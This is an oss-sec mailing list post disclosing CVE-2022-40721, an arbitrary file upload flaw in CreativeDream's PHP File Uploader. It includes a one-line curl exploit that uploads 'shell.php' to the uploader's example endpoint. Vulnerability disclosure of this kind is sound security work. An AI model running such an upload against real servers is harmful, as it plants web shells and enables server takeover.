oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

CreativeDream software arbitrary file upload

From: Larry Cashdollar <larry0 () me com>
Date: Mon, 3 Oct 2022 12:17:43 -0400

Title: CreativeDream software arbitrary file upload
Author: Larry W. Cashdollar
Date: 2022-09-08
CVE-ID:[CVE-2022-40721]
Download Site: https://github.com/CreativeDream
Vendor: CreativeDream
Vendor Notified: 2020-02-19
Vendor Contact: yuliangagarin [at] mail.ru
References: https://github.com/CreativeDream/php-uploader/issues/23
Advisory: http://www.vapidlabs.com/advisory.php?v=216
Description: PHP File Uploader is an easy to use, hi-performance File Upload Script which allows you to upload/download 
files to webserver.
Vulnerability:
The software allows executable file uploads to the web root directory.
Export: JSON TEXT XML
Exploit Code:
        • curl -vk http://localhost/php-uploader/examples/upload.php -F "files=@shell.php"
Previous By Date Next
Previous By Thread Next

Current thread: